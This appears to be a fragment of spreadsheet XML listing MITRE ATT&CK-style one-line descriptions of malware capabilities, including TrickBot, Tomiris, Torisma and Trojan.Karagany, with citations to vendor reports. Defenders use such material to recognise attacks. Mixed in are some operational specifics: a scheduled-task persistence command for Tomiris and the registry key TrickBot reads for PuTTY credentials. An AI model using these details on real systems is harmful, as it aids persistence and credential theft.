    <t>[TinyTurla](https://attack.mitre.org/software/S0668) can upload files from a compromised host.(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>[TinyTurla](https://attack.mitre.org/software/S0668) can go through a list of C2 server IPs and will try to register with each until one responds.(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>[TinyTurla](https://attack.mitre.org/software/S0668) has the ability to act as a second-stage dropper used to infect the system with additional malware.(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>[TinyTurla](https://attack.mitre.org/software/S0668) has mimicked an existing Windows service by being installed as &lt;code&gt;Windows Time Service&lt;/code&gt;.(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>[TinyTurla](https://attack.mitre.org/software/S0668) has been deployed as `w64time.dll` to appear legitimate.(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>[TinyTurla](https://attack.mitre.org/software/S0668) can set its configuration parameters in the Registry.(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>[TinyTurla](https://attack.mitre.org/software/S0668) has used `WinHTTP`, `CreateProcess`, and other APIs for C2 communications and other functions.(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>[TinyTurla](https://attack.mitre.org/software/S0668) can query the Registry for its configuration information.(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>[TinyTurla](https://attack.mitre.org/software/S0668) contacts its C2 based on a scheduled timing set in its configuration.(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>[TinyTurla](https://attack.mitre.org/software/S0668) can install itself as a service on compromised machines.(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>[TinyTurla](https://attack.mitre.org/software/S0668) can use HTTPS in C2 communications.(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>[TinyTurla](https://attack.mitre.org/software/S0668) has been installed using a .bat file.(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>[TinyZBot](https://attack.mitre.org/software/S0004) contains functionality to collect information from the clipboard.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[TinyZBot](https://attack.mitre.org/software/S0004) can disable Avira anti-virus.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[TinyZBot](https://attack.mitre.org/software/S0004) contains keylogger functionality.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[TinyZBot](https://attack.mitre.org/software/S0004) can create a shortcut in the Windows startup folder for persistence.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[TinyZBot](https://attack.mitre.org/software/S0004) contains screen capture functionality.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[TinyZBot](https://attack.mitre.org/software/S0004) supports execution from the command-line.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[TinyZBot](https://attack.mitre.org/software/S0004) can install as a Windows service for persistence.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[Tomiris](https://attack.mitre.org/software/S0671) has the ability to collect recent files matching a hardcoded list of extensions prior to exfiltration.(Citation: Kaspersky Tomiris Sep 2021)</t>
  </si>
  <si>
    <t>[Tomiris](https://attack.mitre.org/software/S0671) has connected to a signalization server that provides a URL and port, and then [Tomiris](https://attack.mitre.org/software/S0671) sends a GET request to that URL to establish C2.(Citation: Kaspersky Tomiris Sep 2021)</t>
  </si>
  <si>
    <t xml:space="preserve"> [Tomiris](https://attack.mitre.org/software/S0671) can upload files matching a hardcoded set of extensions, such as .doc, .docx, .pdf, and .rar, to its C2 server.(Citation: Kaspersky Tomiris Sep 2021)</t>
  </si>
  <si>
    <t>[Tomiris](https://attack.mitre.org/software/S0671) can download files and execute them on a victim's system.(Citation: Kaspersky Tomiris Sep 2021)</t>
  </si>
  <si>
    <t>[Tomiris](https://attack.mitre.org/software/S0671) has used `SCHTASKS /CREATE /SC DAILY /TN StartDVL /TR "[path to self]" /ST 10:00` to establish persistence.(Citation: Kaspersky Tomiris Sep 2021)</t>
  </si>
  <si>
    <t>[Tomiris](https://attack.mitre.org/software/S0671) has been packed with UPX.(Citation: Kaspersky Tomiris Sep 2021)</t>
  </si>
  <si>
    <t>[Tomiris](https://attack.mitre.org/software/S0671) has the ability to sleep for at least nine minutes to evade sandbox-based analysis systems.(Citation: Kaspersky Tomiris Sep 2021)</t>
  </si>
  <si>
    <t>[Tomiris](https://attack.mitre.org/software/S0671) can use HTTP to establish C2 communications.(Citation: Kaspersky Tomiris Sep 2021)</t>
  </si>
  <si>
    <t>[Tor](https://attack.mitre.org/software/S0183) encapsulates traffic in multiple layers of encryption, using TLS by default.(Citation: Dingledine Tor The Second-Generation Onion Router)</t>
  </si>
  <si>
    <t>Traffic traversing the [Tor](https://attack.mitre.org/software/S0183) network will be forwarded to multiple nodes before exiting the [Tor](https://attack.mitre.org/software/S0183) network and continuing on to its intended destination.(Citation: Dingledine Tor The Second-Generation Onion Router)</t>
  </si>
  <si>
    <t>[Torisma](https://attack.mitre.org/software/S0678) has used XOR and Base64 to decode C2 data.(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>[Torisma](https://attack.mitre.org/software/S0678) is only delivered to a compromised host if the victim's IP address is on an allow-list.(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>[Torisma](https://attack.mitre.org/software/S0678) can send victim data to an actor-controlled C2 server.(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>[Torisma](https://attack.mitre.org/software/S0678) has used various Windows API calls.(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>[Torisma](https://attack.mitre.org/software/S0678) has been Base64 encoded and AES encrypted.(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>[Torisma](https://attack.mitre.org/software/S0678) has been packed with Iz4 compression.(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>[Torisma](https://attack.mitre.org/software/S0678) has encoded C2 communications with Base64.(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>[Torisma](https://attack.mitre.org/software/S0678) has encrypted its C2 communications using XOR and VEST-32.(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>[Torisma](https://attack.mitre.org/software/S0678) can use `GetlogicalDrives` to get a bitmask of all drives available on a compromised system. It can also use `GetDriveType` to determine if a new drive is a CD-ROM drive.(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>[Torisma](https://attack.mitre.org/software/S0678) can collect the local MAC address using `GetAdaptersInfo` as well as the system's IP address.(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>[Torisma](https://attack.mitre.org/software/S0678) can use `WTSEnumerateSessionsW` to monitor remote desktop connections.(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>[Torisma](https://attack.mitre.org/software/S0678) can collect the current time on a victim machine.(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>[Torisma](https://attack.mitre.org/software/S0678) can use HTTP and HTTPS for C2 communications.(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>[TrailBlazer](https://attack.mitre.org/software/S0682) can masquerade its C2 traffic as legitimate Google Notifications HTTP requests.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>[TrailBlazer](https://attack.mitre.org/software/S0682) has used random identifier strings to obscure its C2 operations and result codes.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>[TrailBlazer](https://attack.mitre.org/software/S0682) has used filenames that match the name of the compromised system in attempt to avoid detection.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>[TrailBlazer](https://attack.mitre.org/software/S0682) has used HTTP requests for C2.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>[TrailBlazer](https://attack.mitre.org/software/S0682) has the ability to use WMI for persistence.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can implant malicious code into a compromised device's firmware.(Citation: Eclypsium Trickboot December 2020)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) uses web injects and browser redirection to trick the user into providing their login credentials on a fake or modified web page.(Citation: Fidelis TrickBot Oct 2016)(Citation: IBM TrickBot Nov 2016)(Citation: Microsoft Totbrick Oct 2017)(Citation: Trend Micro Trickbot Nov 2018)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has come with a signed downloader component.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) used COM to setup scheduled task for persistence.(Citation: ESET Trickbot Oct 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[TrickBot](https://attack.mitre.org/software/S0266) has the ability to capture RDP credentials by capturing the &lt;code&gt;CredEnumerateA&lt;/code&gt; API(Citation: TrendMicro Trickbot Feb 2019) </t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) uses brute-force attack against RDP with rdpscanDll module.(Citation: ESET Trickbot Oct 2020)(Citation: Bitdefender Trickbot March 2020)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can obtain passwords stored in files from several applications such as Outlook, Filezilla, OpenSSH, OpenVPN and WinSCP.(Citation: Trend Micro Trickbot Nov 2018)(Citation: Cyberreason Anchor December 2019) Additionally, it searches for the ".vnc.lnk" affix to steal VNC credentials.(Citation: TrendMicro Trickbot Feb 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can obtain passwords stored in files from web browsers such as Chrome, Firefox, Internet Explorer, and Microsoft Edge, sometimes using [esentutl](https://attack.mitre.org/software/S0404).(Citation: Trend Micro Trickbot Nov 2018)(Citation: Cyberreason Anchor December 2019)(Citation: Bitdefender Trickbot VNC module Whitepaper 2021)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has retrieved PuTTY credentials by querying the &lt;code&gt;Software\SimonTatham\Putty\Sessions&lt;/code&gt; registry key (Citation: TrendMicro Trickbot Feb 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) collects local files and information from the victim’s local machine.(Citation: S2 Grupo TrickBot June 2017)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) decodes the configuration data and modules.(Citation: Fidelis TrickBot Oct 2016)(Citation: Cyberreason Anchor December 2019)(Citation: Joe Sec Trickbot)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can disable Windows Defender.(Citation: Trend Micro Trickbot Nov 2018)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can gather information about domain trusts by utilizing [Nltest](https://attack.mitre.org/software/S0359).(Citation: Fortinet TrickBot)(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) collects email addresses from Outlook.(Citation: Trend Micro Trickbot Nov 2018)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can send information about the compromised host and upload data to a hardcoded C2 server.(Citation: Cyberreason Anchor December 2019)(Citation: Bitdefender Trickbot VNC module Whitepaper 2021)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) utilizes EternalBlue and EternalRomance exploits for lateral movement in the modules wormwinDll, wormDll, mwormDll, nwormDll, tabDll.(Citation: ESET Trickbot Oct 2020)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has been known to reach a command and control server via one of nine proxy IP addresses. (Citation: Bitdefender Trickbot C2 infra Nov 2020) (Citation: Bitdefender Trickbot VNC module Whitepaper 2021)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can use secondary C2 servers for communication after establishing connectivity and relaying victim information to primary C2 servers.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) searches the system for all of the following file extensions: .avi, .mov, .mkv, .mpeg, .mpeg4, .mp4, .mp3, .wav, .ogg, .jpeg, .jpg, .png, .bmp, .gif, .tiff, .ico, .xlsx, and .zip. It can also obtain browsing history, cookies, and plug-in information.(Citation: S2 Grupo TrickBot June 2017)(Citation: Trend Micro Trickbot Nov 2018)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) module "Trickboot" can write or erase the UEFI/BIOS firmware of a compromised device.(Citation: Eclypsium Trickboot December 2020)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) downloads several additional files and saves them to the victim's machine.(Citation: Trend Micro Totbrick Oct 2016)(Citation: Bitdefender Trickbot VNC module Whitepaper 2021)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) collects the users of the system.(Citation: S2 Grupo TrickBot June 2017)(Citation: Trend Micro Trickbot Nov 2018)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has attempted to get users to launch malicious documents to deliver its payload. (Citation: TrendMicro Trickbot Feb 2019)(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>The [TrickBot](https://attack.mitre.org/software/S0266) downloader has used an icon to appear as a Microsoft Word document.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can modify registry entries.(Citation: Trend Micro Trickbot Nov 2018)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) uses the Windows API call, CreateProcessW(), to manage execution flow.(Citation: S2 Grupo TrickBot June 2017) [TrickBot](https://attack.mitre.org/software/S0266) has also used &lt;code&gt;Nt*&lt;/code&gt; API functions to perform [Process Injection](https://attack.mitre.org/techniques/T1055).(Citation: Joe Sec Trickbot)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) module shareDll/mshareDll discovers network shares via the WNetOpenEnumA API.(Citation: ESET Trickbot Oct 2020)(Citation: Bitdefender Trickbot March 2020)</t>
  </si>
  <si>
    <t>Some [TrickBot](https://attack.mitre.org/software/S0266) samples have used HTTP over ports 447 and 8082 for C2.(Citation: S2 Grupo TrickBot June 2017)(Citation: Fidelis TrickBot Oct 2016)(Citation: Trend Micro Totbrick Oct 2016) Newer versions of [TrickBot](https://attack.mitre.org/software/S0266) have been known to use a custom communication protocol which sends the data unencrypted over port 443. (Citation: Bitdefender Trickbot VNC module Whitepaper 2021)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) uses non-descriptive names to hide functionality and uses an AES CBC (256 bits) encryption algorithm for its loader and configuration files.(Citation: S2 Grupo TrickBot June 2017)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can steal passwords from the KeePass open source password manager.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can identify the groups the user on a compromised host belongs to.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has been known to use PowerShell to download new payloads, open documents, and upload data to command and control servers. 
 (Citation: Bitdefender Trickbot VNC module Whitepaper 2021)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) uses module networkDll for process list discovery.(Citation: ESET Trickbot Oct 2020)(Citation: Bitdefender Trickbot March 2020)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) injects into the svchost.exe process.(Citation: S2 Grupo TrickBot June 2017)(Citation: Trend Micro Totbrick Oct 2016)(Citation: Microsoft Totbrick Oct 2017)(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has used &lt;code&gt;Nt*&lt;/code&gt; [Native API](https://attack.mitre.org/techniques/T1106) functions to inject code into legitimate processes such as &lt;code&gt;wermgr.exe&lt;/code&gt;.(Citation: Joe Sec Trickbot)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) establishes persistence in the Startup folder.(Citation: ESET Trickbot Oct 2020)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) uses vncDll module to remote control the victim machine.(Citation: ESET Trickbot Oct 2020)(Citation: Bitdefender Trickbot March 2020)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can enumerate computers and network devices.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) creates a scheduled task on the system that provides persistence.(Citation: S2 Grupo TrickBot June 2017)(Citation: Trend Micro Totbrick Oct 2016)(Citation: Microsoft Totbrick Oct 2017)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) leverages a custom packer to obfuscate its functionality.(Citation: S2 Grupo TrickBot June 2017)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has used an email with an Excel sheet containing a malicious macro to deploy the malware(Citation: TrendMicro Trickbot Feb 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has been delivered via malicious links in phishing e-mails.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can Base64-encode C2 commands.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) uses a custom crypter leveraging Microsoft’s CryptoAPI to encrypt C2 traffic.(Citation: Fidelis TrickBot Oct 2016)Newer versions of [TrickBot](https://attack.mitre.org/software/S0266) have been known to use `bcrypt` to encrypt and digitally sign responses to their C2 server. (Citation: Bitdefender Trickbot C2 infra Nov 2020)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) gathers the OS version, machine name, CPU type, amount of RAM available, and UEFI/BIOS firmware information from the victim’s machine.(Citation: S2 Grupo TrickBot June 2017)(Citation: Fidelis TrickBot Oct 2016)(Citation: Cyberreason Anchor December 2019)(Citation: Eclypsium Trickboot December 2020)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) obtains the IP address, location, and other relevant network information from the victim’s machine.(Citation: S2 Grupo TrickBot June 2017)(Citation: Trend Micro Trickbot Nov 2018)(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can identify the user and groups the user belongs to on a compromised host.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) collects a list of install programs and services on the system’s machine.(Citation: S2 Grupo TrickBot June 2017)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has used &lt;code&gt;printf&lt;/code&gt; and file I/O loops to delay process execution as part of API hammering.(Citation: Joe Sec Trickbot)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has used a VNC module to monitor the victim and collect information to pivot to valuable systems on the network (Citation: Trickbot VNC module July 2021)(Citation: Bitdefender Trickbot VNC module Whitepaper 2021)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic and various configuration files.(Citation: S2 Grupo TrickBot June 2017)(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has used macros in Excel documents to download and deploy the malware on the user’s machine.(Citation: TrendMicro Trickbot Feb 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) establishes persistence by creating an autostart service that allows it to run whenever the machine boots.(Citation: Trend Micro Trickbot Nov 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Trojan.Karagany](https://attack.mitre.org/software/S0094) can monitor the titles of open windows to identify specific keywords.(Citation: Secureworks Karagany July 2019)	 </t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can secure C2 communications with SSL and TLS.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can steal data and credentials from browsers.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) has used plugins with a self-delete capability.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can enumerate files and directories on a compromised host.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can upload, download, and execute files on the victim.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can capture keystrokes on a compromised host.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can create directories to store plugin output and stage data for exfiltration.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can dump passwords and save them into &lt;code&gt;\ProgramData\Mail\MailAg\pwds.txt&lt;/code&gt;.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can base64 encode and AES-128-CBC encrypt data prior to transmission.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can use [Tasklist](https://attack.mitre.org/software/S0057) to collect a list of running tasks.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can create a link to itself in the Startup folder to automatically start itself upon system restart.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can take a desktop screenshot and save the file into &lt;code&gt;\ProgramData\Mail\MailAg\shot.png&lt;/code&gt;.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) samples sometimes use common binary packers such as UPX and Aspack on top of a custom Delphi binary packer.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can detect commonly used and generic virtualization platforms based primarily on drivers and file paths.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can capture information regarding the victim's OS, security, and hardware configuration.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can gather information on the network configuration of a compromised host.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can use [netstat](https://attack.mitre.org/software/S0104) to collect a list of network connections.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can gather information about the user on a compromised host.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can inject a suspended thread of its own process into a new process and initiate via the &lt;code&gt;ResumeThread&lt;/code&gt; API.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can communicate with C2 via HTTP POST requests.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can perform reconnaissance commands on a victim machine via a cmd.exe process.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Mebromi](https://attack.mitre.org/software/S0001) performs BIOS modification and can download and execute a file as well as protect itself from removal.(Citation: Ge 2011)</t>
  </si>
  <si>
    <t>To establish persistence, [Truvasys](https://attack.mitre.org/software/S0178) adds a Registry Run key with a value "TaskMgr" in an attempt to masquerade as the legitimate Windows Task Manager.(Citation: Microsoft Win Defender Truvasys Sep 2017)</t>
  </si>
  <si>
    <t>[Truvasys](https://attack.mitre.org/software/S0178) adds a Registry Run key to establish persistence.(Citation: Microsoft Win Defender Truvasys Sep 2017)</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) can use WinRAR to create a password-protected archive for files of interest.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) has the ability to use a XOR decryption key to extract C2 server domains and IP addresses.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) can search for specific files and list directories.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) can download additional files and tools from its C2.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) can insert pseudo-random characters into its network encryption setup.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) can store copied files in a specific directory prior to exfiltration.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) can disguise as a legitimate service to blend into normal operations.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) can use VMProtect for obfuscation.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) can scan for removable media to collect data.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) has the ability to use Python to spawn a Unix shell.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) can establish persistence by adding Registry Run keys.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) has the ability to take screenshots.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) can retrieve system information including OS version, memory usage, local hostname, and system adapter information.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) can retrieve the internal IP address of a compromised host.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) can retrieve usernames.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) has the ability to use &lt;code&gt;/bin/sh&lt;/code&gt; to execute commands.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) has the ability to use HTTP for its C2.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) can create a remote shell and execute commands using [cmd](https://attack.mitre.org/software/S0106).(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[UACMe](https://attack.mitre.org/software/S0116) contains many methods for bypassing Windows User Account Control on multiple versions of the operating system.(Citation: Github UACMe)</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) takes advantage of the /SetNotifyCmdLine option in [BITSAdmin](https://attack.mitre.org/software/S0190) to ensure it stays running on a system to maintain persistence.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) has used GitHub and a public blog service in Hong Kong for C2 communications.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) can upload and download files to the victim’s machine.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) encrypts instructions in the payload using a simple XOR cipher.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) can list running processes on the system.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) checks for virtualization software such as VMWare, VirtualBox, or QEmu on the compromised machine.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) has used HTTP for C2 communications.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) can start a command shell.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) has the capability to gather the victim's current directory.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) can download and upload files to and from the victim’s machine.(Citation: FireEye APT10 Sept 2018)</t>
